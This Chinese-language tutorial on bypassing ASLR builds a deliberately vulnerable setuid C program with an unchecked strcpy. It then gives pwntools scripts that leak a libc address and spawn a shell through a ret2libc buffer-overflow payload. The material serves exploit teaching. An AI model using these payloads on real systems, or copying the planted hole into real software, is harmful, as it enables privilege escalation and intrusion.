绕过 ASLR -- 第二部分
漏洞代码
//vuln.c
#include <stdio.h>
#include <string.h>
int main(int argc, char* argv[]) {
char buf[256];
strcpy(buf,argv[1]);
printf("%s\n",buf);
fflush(stdout);
return 0;
}
编译命令
#echo 2 > /proc/sys/kernel/randomize_va_space
$gcc -fno-stack-protector -g -o vuln vuln.c
$sudo chown root vuln
$sudo chgrp root vuln
$sudo chmod +s vuln
这次也可以用之前学过的泄露Libc版本然后获取到system函数和binsh。因为没有找到system_arg,所以还是使用l泄露ibc的方法。
首先确定偏移量
仍然是268
EXP1 泄露出__libc_start_main函数的真实地址
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
vuln = ELF('./vuln')
puts_plt = vuln.plt['puts']
__libc_start_main_got = vuln.got['__libc_start_main']
payload = "A"*268 + p32(puts_plt) + "AAAA" + p32(__libc_start_main_got)
sh = process(['vuln',payload])
sh.recv()
获取地址main函数真实地址 0xf7e1d540
再使用libcsearcher查询libc版本,继而找到system 与 binsh地址
完成调用
EXP2
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
vuln = ELF('./vuln')
puts_plt = vuln.plt['puts']
__libc_start_main_got = vuln.got['__libc_start_main']
"""payload = "A"*268 + p32(puts_plt) + "AAAA" + p32(__libc_start_main_got)
sh = process(['vuln',payload])
sh.recv()"""
__libc_start_main_addr = 0xf7e1d540
log.success('start to get libc')
libc = LibcSearcher('__libc_start_main',__libc_start_main_addr)
libcbase = __libc_start_main_addr - libc.dump('__libc_start_main')
print "libcbase:"+hex(libcbase)
log.success('success get libcbase')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
log.success('now get shell')
payload = "A"*268 + p32(system_addr) + "AAAA" + p32(binsh_addr)
sh = process(['./vuln',payload])
sh.interactive()